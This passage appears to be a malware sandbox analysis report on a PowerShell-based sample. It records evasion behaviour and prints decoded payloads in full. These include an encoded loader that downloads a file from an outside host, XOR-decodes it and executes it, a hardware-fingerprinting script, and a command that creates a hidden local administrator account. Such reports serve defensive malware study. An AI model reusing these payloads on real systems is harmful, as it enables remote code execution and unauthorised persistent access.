        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        barindex
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDrive
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
        Source: C:\Windows\Temp\svczHost.exeMemory allocated: 19BF07C0000 memory reserve | memory write watch
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 900000Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4812Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5082Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6618Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2910Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8085
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1405
        Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 543
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3884
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6450
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1792
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pkwqtvat\pkwqtvat.dllJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1436Thread sleep time: -5534023222112862s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2300Thread sleep count: 6618 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2300Thread sleep count: 2910 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5720Thread sleep time: -6456360425798339s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5720Thread sleep time: -900000s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7480Thread sleep count: 8085 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7624Thread sleep time: -4611686018427385s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2848Thread sleep time: -1844674407370954s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7476Thread sleep count: 1405 > 30
        Source: C:\Windows\System32\svchost.exe TID: 7816Thread sleep time: -30000s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1020Thread sleep count: 3884 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1020Thread sleep count: 346 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5416Thread sleep time: -1844674407370954s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6472Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6204Thread sleep count: 6450 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6204Thread sleep count: 1792 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7456Thread sleep time: -2767011611056431s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5228Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 900000Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
        Source: powershell.exe, 0000000B.00000002.2814252312.0000016AE04B4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
        Source: powershell.exe, 0000000B.00000002.2814252312.0000016AE04B4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
        Source: powershell.exe, 0000000B.00000002.3259080917.0000016AF0120000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000014.00000002.3597736691.00007FF717AEA000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: qEMutating a value collection derived from a dictionary is not allowed.Y
        Source: svchost.exe, 0000000E.00000002.3598264593.0000015D94E58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3596570149.0000015D8F82B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3557582962.000002129BB5B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: powershell.exe, 0000000B.00000002.2814252312.0000016AE04B4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
        Source: powershell.exe, 00000000.00000002.2469718234.000001BDEA64B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2371632794.000001ABF38E2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3415317941.0000016AF7BEC000.00000004.00000020.00020000.00000000.sdmp, svczHost.exe, 00000014.00000002.3595742715.0000019BF0881000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\Temp\svczHost.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBrAGkAbgBnAHMAbQBhAGsAZQByAC4AYwBhAC8AZgBpAGwAZQAyAC8AMwA3AGUAMgBhADUANwA2ADcAOAAxAGYANgAwAGUAYQBlAGEANQA1AGUAMwA3ADkAYgBlADYAYQBlADAAMAA3ADcANgA0ADEAYgAzADkAZgA1ADkAMAA3ADkAMgA0AGQAOAA1ADIANAAyADQAMQBlADIAOQBiADcAYQA1ADMAYQA2ADEAMwBiADMAZAAzADcAZgA5ADAAZQAwADAANQBlADEAMQBiADkANgBkADYAMQAxADcANgAyADkAMAA0ADYAOQA5ADAAYwAxAGQAZgA3ADkAYQBhADkANwAzADUAMgA4ADkAMwAwADgAYwAxAGIAMgBmAGEAOQBlAGQAZQBlAGEANABkAGMANQBmAGUANQBhADAAOQBiAGYAOQBiADIANwA3ADMAZQBlAGEAZgA5ADAAOQA1ADAAYgA2ADkANgBmAGUAMQAwAGMAYwA5AGQAYgAzADcANAA1AGIANQAxADUAMQBlADQAYgAwADAAMABhADcAOQAxADIAMQAzAGMAZgA5ADMAZgAyADUAMAA3ADAAZgA1ADgAOQBiADQAMABmAGQAMwBlADMAOQBjADQAYQAxADgAZQBkAGEAZAAyACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAG
        Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $uri = "https://kingsmaker.ca/file2/37e2a576781f60eaea55e379be6ae0077641b39f5907924d8524241e29b7a53a613b3d37f90e005e11b96d6117629046990c1df79aa9735289308c1b2fa9edeea4dc5fe5a09bf9b2773eeaf90950b696fe10cc9db3745b5151e4b000a791213cf93f25070f589b40fd3e39c4a18edad2";$count = 100;function Send { param( [PSObject] $logMsg ) # Convert body to string $stringBody = [string]($logMsg | ConvertTo-Json); $logMessages = @(); $logMessages += $stringBody; $logMessages += "----------"; $headers = @{}; $key = "Content-Type"; $value = "application/json"; $headers[$key] = $value; $uri = "LOGURL"; try { $body = $logMessages | ConvertTo-Json; Invoke-WebRequest -Uri $uri -Method Post -Headers $headers -Body $body } catch{ } }while($count -gt 0){try{ Send "begin download $uri";$content = Invoke-WebRequest -Uri $uri -UseBasicParsing; $byteArray = $content.content; for ($i = 0; $i -lt $byteArray.Length; $i++) { $byteArray[$i] = $byteArray[$i] -bxor 1; }Invoke-Expression ([System.Text.Encoding]::UTF8.GetString($byteArray));break;}catch{Send $_.Exception.Message;$count -= 1;Start-Sleep -s 15;}}
        Source: C:\Windows\Temp\svczHost.exeProcess created: Base64 decoded function Get-Identity{ $hardDrives = Get-WmiObject -Class Win32_DiskDrive | Where-Object { $_.MediaType -eq "Fixed hard disk media" -or $_.MediaType -eq "Fixed hard disk media - SSD" }$driveInfoArray = @()foreach ($hardDrive in $hardDrives) { $serialNumber = $hardDrive.SerialNumber $model = $hardDrive.Model $driveInfo = "Serial Number: $serialNumber, Model: $model" $driveInfoArray += $driveInfo}$combinedInfo = $driveInfoArray -join "`r`n"$cpuInfo = Get-WmiObject -Class Win32_Processor$cpuDetails = "ProcessorId: $($cpuInfo.ProcessorId), Name: $($cpuInfo.Name), MaxClockSpeed: $($cpuInfo.MaxClockSpeed), UniqueId: $($cpuInfo.UniqueId)"$allInfo = "$combinedInfo`r`n$cpuDetails"$md5 = New-Object System.Security.Cryptography.MD5CryptoServiceProvider$bytes = [System.Text.Encoding]::UTF8.GetBytes($allInfo)$hashBytes = $md5.ComputeHash($bytes)$hash = [BitConverter]::ToString($hashBytes) -replace '-' return $hash;}cd "C:\Windows\Temp";$test = Get-Identity;$test | Out-File -FilePath "deviceId.txt" -Encoding UTF8
        Source: C:\Windows\Temp\svczHost.exeProcess created: Base64 decoded $Username = "User1";$pwd = "123456789!A1a"; $UserParams = @{'Name' = $Username; 'Password' = (ConvertTo-SecureString -String $pwd -AsPlainText -Force); 'PasswordNeverExpires' = $true};New-LocalUser @UserParams;$GroupParams = @{'Group' = 'Administrators'; 'Member' = $Username};Add-LocalGroupMember @GroupParams;
        Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $uri = "https://kingsmaker.ca/file2/37e2a576781f60eaea55e379be6ae0077641b39f5907924d8524241e29b7a53a613b3d37f90e005e11b96d6117629046990c1df79aa9735289308c1b2fa9edeea4dc5fe5a09bf9b2773eeaf90950b696fe10cc9db3745b5151e4b000a791213cf93f25070f589b40fd3e39c4a18edad2";$count = 100;function Send { param( [PSObject] $logMsg ) # Convert body to string $stringBody = [string]($logMsg | ConvertTo-Json); $logMessages = @(); $logMessages += $stringBody; $logMessages += "----------"; $headers = @{}; $key = "Content-Type"; $value = "application/json"; $headers[$key] = $value; $uri = "LOGURL"; try { $body = $logMessages | ConvertTo-Json; Invoke-WebRequest -Uri $uri -Method Post -Headers $headers -Body $body } catch{ } }while($count -gt 0){try{ Send "begin download $uri";$content = Invoke-WebRequest -Uri $uri -UseBasicParsing; $byteArray = $content.content; for ($i = 0; $i -lt $byteArray.Length; $i++) { $byteArray[$i] = $byteArray[$i] -bxor 1; }Invoke-Expression ([System.Text.Encoding]::UTF8.GetString($byteArray));break;}catch{Send $_.Exception.Message;$count -= 1;Start-Sleep -s 15;}}Jump to behavior
        Source: C:\Windows\Temp\svczHost.exeProcess created: Base64 decoded function Get-Identity{ $hardDrives = Get-WmiObject -Class Win32_DiskDrive | Where-Object { $_.MediaType -eq "Fixed hard disk media" -or $_.MediaType -eq "Fixed hard disk media - SSD" }$driveInfoArray = @()foreach ($hardDrive in $hardDrives) { $serialNumber = $hardDrive.SerialNumber $model = $hardDrive.Model $driveInfo = "Serial Number: $serialNumber, Model: $model" $driveInfoArray += $driveInfo}$combinedInfo = $driveInfoArray -join "`r`n"$cpuInfo = Get-WmiObject -Class Win32_Processor$cpuDetails = "ProcessorId: $($cpuInfo.ProcessorId), Name: $($cpuInfo.Name), MaxClockSpeed: $($cpuInfo.MaxClockSpeed), UniqueId: $($cpuInfo.UniqueId)"$allInfo = "$combinedInfo`r`n$cpuDetails"$md5 = New-Object System.Security.Cryptography.MD5CryptoServiceProvider$bytes = [System.Text.Encoding]::UTF8.GetBytes($allInfo)$hashBytes = $md5.ComputeHash($bytes)$hash = [BitConverter]::ToString($hashBytes) -replace '-' return $hash;}cd "C:\Windows\Temp";$test = Get-Identity;$test | Out-File -FilePath "deviceId.txt" -Encoding UTF8
        Source: C:\Windows\Temp\svczHost.exeProcess created: Base64 decoded $Username = "User1";$pwd = "123456789!A1a"; $UserParams = @{'Name' = $Username; 'Password' = (ConvertTo-SecureString -String $pwd -AsPlainText -Force); 'PasswordNeverExpires' = $true};New-LocalUser @UserParams;$GroupParams = @{'Group' = 'Administrators'; 'Member' = $Username};Add-LocalGroupMember @GroupParams;
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pkwqtvat\pkwqtvat.cmdline"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfileJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /min "" powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBrAGkAbgBnAHMAbQBhAGsAZQByAC4AYwBhAC8AZgBpAGwAZQAyAC8AMwA3AGUAMgBhADUANwA2ADcAOAAxAGYANgAwAGUAYQBlAGEANQA1AGUAMwA3ADkAYgBlADYAYQBlADAAMAA3ADcANgA0ADEAYgAzADkAZgA1ADkAMAA3ADkAMgA0AGQAOAA1ADIANAAyADQAMQBlADIAOQBiADcAYQA1ADMAYQA2ADEAMwBiADMAZAAzADcAZgA5ADAAZQAwADAANQBlADEAMQBiADkANgBkADYAMQAxADcANgAyADkAMAA0ADYAOQA5ADAAYwAxAGQAZgA3ADkAYQBhADkANwAzADUAMgA4ADkAMwAwADgAYwAxAGIAMgBmAGEAOQBlAGQAZQBlAGEANABkAGMANQBmAGUANQBhADAAOQBiAGYAOQBiADIANwA3ADMAZQBlAGEAZgA5ADAAOQA1ADAAYgA2ADkANgBmAGUAMQAwAGMAYwA5AGQAYgAzADcANAA1AGIANQAxADUAMQBlADQAYgAwADAAMABhADcAOQAxADIAMQAzAGMAZgA5ADMAZgAyADUAMAA3ADAAZgA1ADgAOQBiADQAMABmAGQAMwBlADMAOQBjADQAYQAxADgAZQBkAGEAZAAyACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQB